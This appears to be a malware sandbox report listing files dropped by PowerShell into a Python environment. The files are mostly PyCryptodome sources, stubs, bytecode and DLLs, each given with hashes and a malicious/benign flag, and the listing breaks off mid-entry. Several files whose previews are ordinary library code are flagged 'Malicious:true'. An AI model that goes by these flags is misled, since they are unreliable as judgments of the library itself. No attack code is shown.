                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3368
                                                                                                                                                                                                                              Entropy (8bit):4.623430359144985
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:PjOqA+h7+/O1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAow58Kk1VZFGK0SOrTQASxCs
                                                                                                                                                                                                                              MD5:D6B0C334F2E86B944B8B5C595D46091B
                                                                                                                                                                                                                              SHA1:6D774B4906613E8AEDE7889D06E5F57C3BA51DE5
                                                                                                                                                                                                                              SHA-256:11E9396C412E693B5A7D2B9A455BF7596853BE94BC0FCE01F292C1732934CBA3
                                                                                                                                                                                                                              SHA-512:A58B1231C7EEBBEC0AFE7192A59204912A88D5E3F51A0356811DCBC11158A11E5D4FF617B4682817D8BE56C88FDA27BBAB95850C77C876336A2DE25927F129EB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... def size_
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8901
                                                                                                                                                                                                                              Entropy (8bit):4.841428903824507
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:cwPQHv3DZKGLo/sNke4hft2vVHZNfvXv/Ii:zPeY2v1ZNf/oi
                                                                                                                                                                                                                              MD5:F85B4D32AF5D4BBD777FB171BB3B3BD2
                                                                                                                                                                                                                              SHA1:EC768344A4163127698DDEA1D4D0D63E6EAF7D49
                                                                                                                                                                                                                              SHA-256:54F3AB21742989AD8BC1AA56D34505F1601E1DBFAEA89A121F981784FF339DB5
                                                                                                                                                                                                                              SHA-512:82D02ECDB710663402330D41E181BB36E73C095C417DE68A1B030F44DF0D90EF6134BFDB919C93F5951622CACAABF25D351811464410D9B159B5E075086BBE29
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#..# ElGamal.py : ElGamal encryption/decryption and signatures..#..# Part of the Python Cryptography Toolkit..#..# Originally written by: A.M. Kuchling..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WI
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):692
                                                                                                                                                                                                                              Entropy (8bit):4.899620335781504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                                                                                                              MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                                                                                                              SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                                                                                                              SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                                                                                                              SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31755
                                                                                                                                                                                                                              Entropy (8bit):4.716755149805653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+r6qvF2WYnlLZlnIEgLH3azy+uAlsKMWsKtCVeC:+rpdzYn9Zln0OLuAlsnKtCf
                                                                                                                                                                                                                              MD5:0947B4DBE43E62701069600DBDF79A8C
                                                                                                                                                                                                                              SHA1:0FC15553FE43466C3E23A2524771E15F2203D317
                                                                                                                                                                                                                              SHA-256:5047981C1EF9B12C37FF5E5010FC9BB200FA2C7EEC64EB002ABD452944864A0E
                                                                                                                                                                                                                              SHA-512:E904116A422EC30B52DCFBDA65FB19FF73852E4CC02107D59F785C170B42E6E040846F14F2ADCCA4ED3DFA6DE3527D531342EB60DF30AA4EA5929693029A441C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2599
                                                                                                                                                                                                                              Entropy (8bit):4.5725118156821445
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REquT4+vZ7+/0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:B+h7+/05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                                                                                                              MD5:0DF7584DEADC1160766A1CF2E07FA3D2
                                                                                                                                                                                                                              SHA1:79484FB8B9D7CE922DEBCAF136CDE6176DF649B4
                                                                                                                                                                                                                              SHA-256:5CBA0D3C44217538026D4585ACA8F592FC0B21AD618AB11D45715539A365E024
                                                                                                                                                                                                                              SHA-512:DD9AF3B3D3CBD332D831206883BF3C902ADCD828108215C00FA0D898B310A92A23D581BA3A513A5EA50880022E6DACF44E0AD1AF52253EE1F094F348F7B971E8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, other: obj
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3236
                                                                                                                                                                                                                              Entropy (8bit):5.060017011908534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:KIB0jcQHMsvI/S3oCFG+FA16eY6ByyvHDKZQLPmO/x/c6VevK94i:dFQHvo7LQT4P6QLeO/a6CK94i
                                                                                                                                                                                                                              MD5:4A857A07C057F9867133A3BDF93BCE2F
                                                                                                                                                                                                                              SHA1:C49098F9F3D62CDAF15C53AE244AFD60C25356CF
                                                                                                                                                                                                                              SHA-256:EE62ED1363AE2633B7498B8AE333E525CEBA8AF94CBA9F1C6DF4939581C759D8
                                                                                                                                                                                                                              SHA-512:AB6B0492D6B6C1EC1BB792611493A6E1760B7B7E0F7D1610E6578DFA511E4963DE637E52E7BD2699696845DB6BE75CC96CEC44A47ED06E167719981483B436DE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26566
                                                                                                                                                                                                                              Entropy (8bit):5.5508121493099765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:syA5CVQOKneTq5xFukQsE1W/EZJTm16kpy0:syVQUm7IX016ko0
                                                                                                                                                                                                                              MD5:0A0E55503A44B810585AAEF48510CD2E
                                                                                                                                                                                                                              SHA1:C5B0855BD4FE907C79374C0115BF4795A35525CD
                                                                                                                                                                                                                              SHA-256:233D393B520782140487FCA1BA4BD4AA329DA0557FE30895B956F657D19297A4
                                                                                                                                                                                                                              SHA-512:FE3015737DF02C2FD1B7F2C46C50B1DCE5F8F2809E19EE594F647395C56877A14736E65E70EC46EC21267690BBBD6A75E64BDFCB93FA0C176146A9C15CA2855B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.Z..............................g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z ....G.d...d.e!........Z"d...Z#d.d...Z$d.d...Z%d...Z&d...Z'd...Z(d...Z)d...Z*d.d...Z+e+Z,d.Z-y.).)...generate..construct..DsaKey..import_key.....N)...bchr..bord..tobytes..tostr..iter_range)...Random)...PKCS8..PEM)...SHA256)...DerObject..DerSequence..DerInteger..DerObjectId..DerBitString)...Integer)...test_probable_prime..COMPOSITE..PROBABLY_PRIME)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc..........................e.Z.d.Z.d.Z.g.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.....d.d...Z.e.Z.e.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a....Class defining an actual DSA key.. Do not instantiate directly.. Use :func:`generate`, :func:`construct` or :func:`import
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):70934
                                                                                                                                                                                                                              Entropy (8bit):5.520138683848232
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:JWp4x7P1zsXa3+zh9Urv0zyT5Lv/kFDirLi5kaNYK:JbRaqUjz4J31aD
                                                                                                                                                                                                                              MD5:92D8850216746F1909326A86E41D5DB3
                                                                                                                                                                                                                              SHA1:9A32FDD09156C13400C0C09B1476185D47EE4226
                                                                                                                                                                                                                              SHA-256:68BC4C7736F15D6D1B7CA61CD15E26E47E097E7E0287DBFDDDCC20E35844CC62
                                                                                                                                                                                                                              SHA-512:3B8664DC37743C1AC41963B35B2B121539629CE73E3FFAF4C95D09D04F74EB4F55ED4155331B6EB9A4F84B34FFFA4A41D1196F1011443D6F990A31F4678A87A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vfc.........................V.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'..d.d.l(m)Z)....e.d.d.........Z*..e.d.d.........Z+..e.d.d.........Z,d...Z-..e.d.d.........Z.i.Z/g.d...a0d...Z1..e1..........[1g.d...a2d...Z3..e3..........[3g.d...a4d...Z5..e5..........[5g.d...a6d...Z7..e7..........[7g.d...a8d...Z9..e9..........[9d d!g.a:d"..Z;..e;..........[;d#d$g.a<d%..Z=..e=..........[=..G.d&..d'e>........Z?..G.d(..d)e@........ZA..eAe/d*....j...................e/d*....j...................d*........ZDe/d*....j...................eD.+........ZFe/j...................eHj...................t`........eF..................[D[Fb0..eAe/d,....j...................e/d,....j...................d,........ZJe/d,....j...................eJ.+........ZKe/j...................eHj...................td........eK..................[J[Kb2..eAe/d-
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10817
                                                                                                                                                                                                                              Entropy (8bit):5.084470151504848
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:TIvGl6FEhPkw6Gys161MQSPfEwfBW9BrYZt+o/J8t:T0GJhPN16SQSPflMncZUo/J8t
                                                                                                                                                                                                                              MD5:813E9B7EAF14CD527E994732CBB4B5C6
                                                                                                                                                                                                                              SHA1:AA3F24B080AE788E28E2915DB2BF22894059E0FA
                                                                                                                                                                                                                              SHA-256:C60B90CB8BEA939B4C71C5C79402AE14B9B49CF5EBD8A69D8437D4A81B95569B
                                                                                                                                                                                                                              SHA-512:CBC269C48739855DF7E9D177D61D588C6FF784434B3714C4AC70D989E161F29A59BBD949FA5D2DDD4BE8C1DA6C4937CD3EA2FF5BD99DA549915C4ACA72E860B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf."........................Z.....g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z.y.).)...generate..construct..ElGamalKey.....)...Random)...generate_probable_safe_prime..test_probable_prime..COMPOSITE)...Integerc.....................f.....t.................}.t.........|.|...........|._.........|.j...................d.z...d.z...}...t.........t.........j...................d.|.j...................|...........d.|.j...........................|._.........|.j...................d.v.r..L|.j...................d.z...|.j...................z...d.k(..r..l|.j...................j...................|.j...........................}.|.j...................d.z...|.z...d.k(..r.....t.........j...................d.|.j...................d.z...|...........|._.........t.........|.j...................|.j...................|.j...........................|._.........|.S.).a....Randomly generate a fresh, new ElGamal key... The key will be safe for use for both encrypt
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33180
                                                                                                                                                                                                                              Entropy (8bit):5.491315183742685
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:aVtyqMQ8pF6ME4UnDAHi3BdpPZbdiXeZa9oNCO7UbwT4:IMQ8CME4UnDFboaHCO7lE
                                                                                                                                                                                                                              MD5:DFFB1A7EA1B2357525803A3E069C918B
                                                                                                                                                                                                                              SHA1:EE4DDA0D2D526E3B482162C7EF6E4C84C762CD8A
                                                                                                                                                                                                                              SHA-256:5881F899BD0590AB21477D1C74AE5160C46D2F3869F682CB8EB75926DA4AE605
                                                                                                                                                                                                                              SHA-512:30EE563E6B02542C1DB2C48333F533A021F4FFB7568054475A77DD14C531310E4F6D3689A5BBC70E84B7892B6FBBF2C40680253061B0F7F136BDB6443E043E71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.|..............................g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d...Z"d.d...Z#e#Z$d.Z%y.).)...generate..construct..import_key..RsaKey..oid.....N)...Random)...tobytes..bord..tostr)...DerSequence..DerNull)...bytes_to_long)...Integer)...test_probable_prime..generate_probable_prime..COMPOSITE)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc.....................L.....e.Z.d.Z.d.Z.d...Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.....d&d...Z.d...Z.d...Z d...Z!d ..Z"d!..Z#d"..Z$d#..Z%d$..Z&d%..Z'y.)'r....a....Class defining an RSA key, private or public..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2703
                                                                                                                                                                                                                              Entropy (8bit):5.329167873888512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MydxEzoez3W6K6Bs80ExYrAyW058s5z/6AVo7IqpQRKctJ16m:MydGUUG6BBAyyWJXd7IqpQRK9m
                                                                                                                                                                                                                              MD5:ED58403B4F34E05A210481012C7BE036
                                                                                                                                                                                                                              SHA1:1B98BB942BF2092A76B7BE9FE6C4AF4625571549
                                                                                                                                                                                                                              SHA-256:B466AF3DC28CBD96F920100B5468DCFD3A43AA5CFBFE89F57D3AD0E7FCC8C944
                                                                                                                                                                                                                              SHA-512:27433ED4A67F879D6DBEEE8CEBF0DD807D67534DB88910C8D0C697689EF8B3C886139A59103838070D146D728F5DDD2A3B81B4D46ABD14D34C230F175A614E4E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................2.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d...Z.d...Z.d...Z.y.)......)...DerSequence..DerInteger..DerBitString..DerObjectId..DerNullc..........................t.................j...................|.d...........}.t.................j...................|.d.....d...........}.t.................j...................|.d.............}.t.................j...................|.d.............j...................}.t.........|.........d.k(..r.d.}.n...t.................j...................|.d...............d.}.|.j...................|.|.f.S.#...|.d.....}.Y...x.Y.w.).z.Parse a SubjectPublicKeyInfo structure... It returns a triple with:. * OID (string). * encoded public key (bytes). * Algorithm parameters (bytes or None). .........nr_elementsr....)......r....r....N).r......decoder....r......value..lenr....)...encoded..spki..algo..algo_oid..spk..algo_paramss.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/PublicKey/__init__.py.._ex
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4919
                                                                                                                                                                                                                              Entropy (8bit):5.383122973203114
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MzkBmSH7FQBjLJTXWaj2dSfs/h59awKG6MwEARypoMWvYv+6fM:r8SsJTXbcSi79NKcAUD+Yv+x
                                                                                                                                                                                                                              MD5:1674572E5A41CD50851BDA05FA2DC165
                                                                                                                                                                                                                              SHA1:39688887080BD13574A2B6B33216B607387F0B94
                                                                                                                                                                                                                              SHA-256:A1CF12ABA8D40466540C01FED59E620D148B3734F12E4BB134D8699D1F4DD066
                                                                                                                                                                                                                              SHA-512:2C9DF840CA32F388FB8F8A9CB1DB1983CAA9E6B971043D6F8D270AA224AACA4428E216CE916989D57B2F04D637CE6E1D34525D6FB9E58C0993DC1CECF038DE1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................n.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d...Z.d...Z.d...Z.d...Z.d...Z.y.)......N)...AES)...SHA512)..._bcrypt_hash)...strxor)...tostr..bchr..bordc.....................z.....t.........|.........d.k...r.t.........d...........t.........j...................d.|.d.d...........d.....}.|.|.d.d...f.S.).N.....z.Insufficient data..>Ir....)...len..ValueError..struct..unpack)...data..values.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/PublicKey/_openssh.py..read_int4r....(...sD.........4.y.1.}.....,..-..-....M.M.$...R.a....).!..,.E....$.q.r.(.?........c.....................d.....t.........|.........\...}.}.t.........|.........|.k...r.t.........d...........|.d.|...|.|.d...f.S.).Nz.Insufficient data (V)).r....r....r....).r......sizes.... r......read_bytesr..../...s>.........4...J.D.$....4.y.4........0..1..1........;...T.U....#..#r....c.....................8.....t.........|.........\...}.}.t.........|.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):754688
                                                                                                                                                                                                                              Entropy (8bit):7.624959985050181
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                                                                                                                                                                                              MD5:3F20627FDED2CF90E366B48EDF031178
                                                                                                                                                                                                                              SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                                                                                                                                                                                              SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                                                                                                                                                                                              SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d....e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27648
                                                                                                                                                                                                                              Entropy (8bit):5.792654050660321
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                                                                                                                                                                                              MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                                                                                                                                                                                              SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                                                                                                                                                                                              SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                                                                                                                                                                                              SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d....e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):67072
                                                                                                                                                                                                                              Entropy (8bit):6.060461288575063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:nqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRLpq:nqctkGACFI5t35q2JbgrwwOoqLTM9rMh
                                                                                                                                                                                                                              MD5:5782081B2A6F0A3C6B200869B89C7F7D
                                                                                                                                                                                                                              SHA1:0D4E113FB52FE1923FE05CDF2AB9A4A9ABEFC42E
